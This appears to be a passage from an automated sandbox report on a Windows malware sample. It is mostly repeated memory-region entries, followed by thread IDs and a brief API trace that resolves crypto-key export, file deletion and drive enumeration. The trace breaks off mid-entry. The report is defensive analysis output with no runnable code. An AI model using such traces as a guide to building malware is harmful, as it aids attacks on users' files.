region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20268 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20269 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20270 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20271 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20272 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20273 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20274 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20275 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20276 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20277 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20278 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20279 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20280 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20281 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20282 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20283 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20284 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20285 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20286 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20287 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20288 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20289 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20290 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20291 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20292 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20293 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20294 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20295 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20296 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20297 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20298 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20299 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20300 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20301 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20302 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20303 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20304 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20305 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20306 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20307 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20308 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20309 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20310 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20311 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20312 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20313 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20314 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20315 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20316 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20317 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20318 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20319 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20320 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20321 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20322 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20323 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20324 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20325 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20326 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20327 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20328 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20329 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20330 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20331 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20332 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20333 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20334 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20335 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20336 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20337 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20338 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20339 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20340 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20341 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20342 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20343 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20344 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20345 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20346 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20347 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20348 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20349 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20350 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20351 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20352 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20353 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20354 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20355 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20356 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20357 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20358 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20359 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20360 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20361 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20362 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20363 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20364 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20365 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20366 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20367 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20368 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20369 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20370 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20371 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20372 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20373 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20374 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20375 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20376 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20377 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20378 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20379 start_va = 0x2760000 end_va = 0x2854fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 20380 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20381 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20382 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20383 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20384 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20385 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20386 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20387 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20388 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20389 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20390 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20391 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20392 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20393 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20394 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20395 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20396 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20397 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20398 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20399 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20400 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20401 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20402 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20403 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20404 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20405 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20406 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20407 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20408 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20409 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20410 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20411 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20412 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20413 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20414 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20415 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20416 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20417 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20418 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20419 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20420 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20421 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20422 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20423 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20424 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20425 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20426 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20427 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20428 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20429 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20430 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20431 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20432 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20433 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20434 start_va = 0x2a00000 end_va = 0x2a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 20435 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 20436 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20437 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20438 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20439 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20440 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20441 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20442 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20443 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20444 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20445 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20446 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20447 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20448 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20449 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20450 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20451 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20452 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20453 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20454 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20455 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20456 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20457 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20458 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20459 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20460 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20461 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20462 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20463 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20464 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20465 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20466 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20467 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20468 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20469 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20470 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20471 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20472 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20473 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20474 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20475 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20476 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20477 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20478 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20479 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20480 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20481 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20482 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20483 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20484 start_va = 0x2a90000 end_va = 0x2b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 20485 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 20486 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20487 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20488 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20489 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20490 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20491 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20492 start_va = 0x110000 end_va = 0x112fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Thread: id = 978 os_tid = 0x8a4 Thread: id = 979 os_tid = 0x460 Thread: id = 980 os_tid = 0x454 Thread: id = 981 os_tid = 0x44c Thread: id = 982 os_tid = 0xee4 [0125.046] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77550000 [0125.046] GetProcAddress (hModule=0x77550000, lpProcName="LoadLibraryA") returned 0x77567070 [0125.046] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x7fefaaa0000 [0125.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x7feff740000 [0125.047] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x7fefddf0000 [0125.047] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7fefe360000 [0125.073] LoadLibraryA (lpLibFileName="Iphlpapi.dll") returned 0x7fefaf60000 [0125.076] GetProcAddress (hModule=0x77550000, lpProcName="GetLastError") returned 0x77572dd0 [0125.076] GetProcAddress (hModule=0x77550000, lpProcName="VirtualFree") returned 0x77561260 [0125.076] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptExportKey") returned 0x7feff748140 [0125.076] GetProcAddress (hModule=0x77550000, lpProcName="DeleteFileW") returned 0x7755ad90 [0125.076] GetProcAddress (hModule=0x77550000, lpProcName="GetDriveTypeW") returned 0x7756bdf0 [0125.076] GetProcAddress (hModule=0x77550000, lpProcName="GetCommandLineW") returned 0x7756c480 [0125.076] GetProcAddress (hModule=0x77550000, lpProcName="GetStartupInfoW") 